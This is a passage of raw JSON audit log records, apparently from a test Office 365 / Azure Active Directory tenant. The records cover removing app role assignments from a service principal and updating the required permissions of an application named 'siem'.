Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", 
"OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", 
"Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": 
"1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", 
"Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": 
[{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": 
"d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": 
"18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n 
{\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.5873254Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492828"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "fe115c66-3e08-4ab4-8a00-84ae25a59078"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": 
\"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": 
"08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.5873254Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492828"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 